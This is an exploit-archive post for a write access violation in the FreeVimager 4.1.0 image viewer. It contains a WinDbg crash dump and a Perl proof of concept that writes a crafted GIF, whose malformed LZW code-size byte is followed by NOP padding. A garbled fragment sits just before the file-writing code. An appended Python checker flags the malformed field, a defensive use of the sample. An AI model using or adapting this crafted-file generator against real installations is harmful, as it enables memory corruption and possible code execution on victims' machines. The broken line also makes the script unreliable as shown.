FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

Posted Dec 9, 2012
Authored by Jean Pascal Pereira

FreeVimager version 4.1.0 suffers from a WriteAV arbitrary code execution vulnerability.

tags | exploit, arbitrary, code execution
MD5 | 61d798881601d91f5efcb2d152c5af4e

#!/usr/bin/perl
use strict;
use warnings;

# FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI: http://www.contaware.com

# Vendor Description:

# This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files,
# ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this
# Freeware is to be a small and handy tool doing what it says and running also as a standalone
# exe file (installer not necessary).

# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 00c9a000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
# ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
# ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
# ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
# ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.dll
# ModLoad: 00340000 00349000 C:\WINDOWS\system32\Normaliz.dll
# ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll
# ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll
# (e48.568): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\Wtsapi32.dll
# ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
# ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
# ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL
# ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll
# (e48.568): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
# eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1c02c3:
# 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=????????
# 0:000> r;!exploitable -v;q
# eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
# eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
# image00400000+0x1c02c3:
# 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# Exception Faulting Address: 0x2151c154
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
#
# Exception Hash (Major/Minor): 0x50747228.0x58333273
#
# Stack Trace:
# image00400000+0x1c02c3
# image00400000+0x1bfd07
# image00400000+0x18abb4
# kernel32!VirtualAllocEx+0x47
# kernel32!VirtualAlloc+0x18
# image00400000+0x18a0ef
# image00400000+0x18a121
# image00400000+0x24fb01
# image00400000+0x24fc4e
# image00400000+0x23be55
# image00400000+0x95a48
# image00400000+0x4fd8
# image00400000+0xf054e
# image00400000+0xea85e
# ntdll!RtlFreeHeap+0x130
# ntdll!RtlFreeHeap+0x130
# kernel32!CreateActCtxW+0xb6c
# kernel32!CreateActCtxW+0xcbf
# Instruction Address: 0x00000000005c02c3

# Proof of Concept:

my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5".
"\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE".
"\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78".
"\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8".
"\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F".
"\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0".
"\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73".
"\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00".
"\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60";

my $junk = "\x90" x 163;

:raw", "crafted.gif");">
# Write the GIF header followed by the NOP padding as raw bytes (no newline translation).
open(my $out, ">:raw", "crafted.gif") or die "cannot write crafted.gif: $!";
print $out $crafted.$junk;
close($out) or die "cannot close crafted.gif: $!";

# http://0xffe4.org
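Added example, not part of the advisory and not FreeVimager's code: a structural GIF checker that a defender can run on untrusted files before handing them to a full decoder. It walks the container (header, logical screen descriptor, colour tables, extension blocks, image descriptors) without decoding pixel data, and reports the one field the crafted file above abuses, the LZW minimum code size byte, which sits at offset 127 of `$crafted` with the value 0xFB (251). The register dump is consistent with that byte driving the crash: the faulting instruction writes to `ecx+edx*4-8` with edx = 0x08000004, which is (1 << (251 mod 32)) + 4, the pattern of a decoder that derives its clear code and code-table index from an unchecked size; that reading is an inference from the page, not a statement from the vendor. The 2..8 acceptance range, the message wording, and the two sample inputs (the PoC bytes plus the well-known transparent 1x1 GIF) are this example's own choices.

```python
"""Structural GIF sanity check (added example; not part of the advisory).

Walks the GIF container without decoding pixel data and reports fields a
decoder would have to trust: the LZW minimum code size of each image block
and truncated sub-block chains.  Limits and messages are this example's own.
"""
import struct

# GIF89a defines the LZW minimum code size as the pixel depth, 2..8 bits.
# GIF LZW codes never exceed 12 bits, so any value above 11 is impossible for
# a conforming stream; a decoder that trusts the byte anyway derives its clear
# code (1 << size) and code-table indices from it.
MIN_CODE_SIZE_LO, MIN_CODE_SIZE_HI = 2, 8

# Constructed sample 1: the 130-byte crafted header from the PoC above
# (GIF89a, 24x24, 32-entry global colour table, one graphic control extension,
# one image descriptor, LZW minimum code size 0xFB) plus the 163 NOP bytes the
# PoC appends, 293 bytes in total.
CRAFTED = bytes.fromhex(
    "47494638396118001800c40000"
    "a2c5e1ebf3f98cb8da498ec395bddcfefe"
    "ff75aad33884bed5e5f15d9aca2678"
    "b82276b7c4daecddeaf45596c8f4f8"
    "fc89b5d8f1f6fa2879b887b5d8317f"
    "bc2377b89ec3e09ec3df68a1cee6f0"
    "f7fafcfd1f74b68eb9daffffff1e73"
    "b51e74b6"
    "21f9040000000000"
    "2c000000001800180000"
    "fb0560"
) + b"\x90" * 163

# Constructed sample 2: the well-known transparent 1x1 GIF, structurally clean.
BENIGN_1X1 = bytes.fromhex(
    "474946383961" "01000100800000" "000000ffffff"
    "21f9040100000000" "2c000000000100010000" "02" "024401" "00" "3b"
)


def _colour_table_len(packed):
    """Byte length of a colour table announced by a packed field (0 if absent)."""
    if not packed & 0x80:
        return 0
    return 3 * (2 << (packed & 0x07))     # 2 ** (N + 1) RGB entries


def _skip_sub_blocks(data, pos):
    """Advance over a chain of data sub-blocks; return the offset after the 0 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("offset %d: truncated data sub-blocks" % pos)
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def check_gif(data):
    """Return a list of findings (strings); an empty list means the structure is clean."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return ["offset 0: not a GIF header"]
    findings = []
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13 + _colour_table_len(packed)
    try:
        if pos > len(data):
            raise ValueError("offset 13: global colour table runs past end of file")
        while True:
            if pos >= len(data):
                raise ValueError("offset %d: missing trailer (0x3B)" % pos)
            block = data[pos]
            if block == 0x3B:                             # trailer: done
                break
            if block == 0x21:                             # extension: label + sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
                continue
            if block != 0x2C:
                raise ValueError("offset %d: unknown block introducer 0x%02X" % (pos, block))
            if pos + 10 > len(data):
                raise ValueError("offset %d: truncated image descriptor" % pos)
            left, top, iw, ih, ipacked = struct.unpack_from("<HHHHB", data, pos + 1)
            if left + iw > width or top + ih > height:
                findings.append("offset %d: image extends outside the logical screen" % pos)
            pos += 10 + _colour_table_len(ipacked)        # skip any local colour table
            if pos >= len(data):
                raise ValueError("offset %d: missing LZW minimum code size" % pos)
            mcs = data[pos]
            if not MIN_CODE_SIZE_LO <= mcs <= MIN_CODE_SIZE_HI:
                findings.append(
                    "offset %d: LZW minimum code size %d outside %d..%d "
                    "(a trusting decoder would take 1<<%d as its clear code)"
                    % (pos, mcs, MIN_CODE_SIZE_LO, MIN_CODE_SIZE_HI, mcs))
            pos = _skip_sub_blocks(data, pos + 1)         # skip the image data
    except ValueError as exc:
        findings.append(str(exc))
    return findings


if __name__ == "__main__":
    for name, blob in (("crafted.gif", CRAFTED), ("benign-1x1.gif", BENIGN_1X1)):
        print(name, check_gif(blob) or ["clean"])
```

Run against the PoC bytes the checker reports the out-of-range code size at offset 127 and, because the NOP padding is read as sub-block length bytes, a truncated sub-block chain; the 1x1 GIF passes clean. The point of keeping the check structural is that it costs nothing to run in an upload pipeline or a mail gateway, and it rejects exactly the class of file a decoder must never be allowed to trust.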
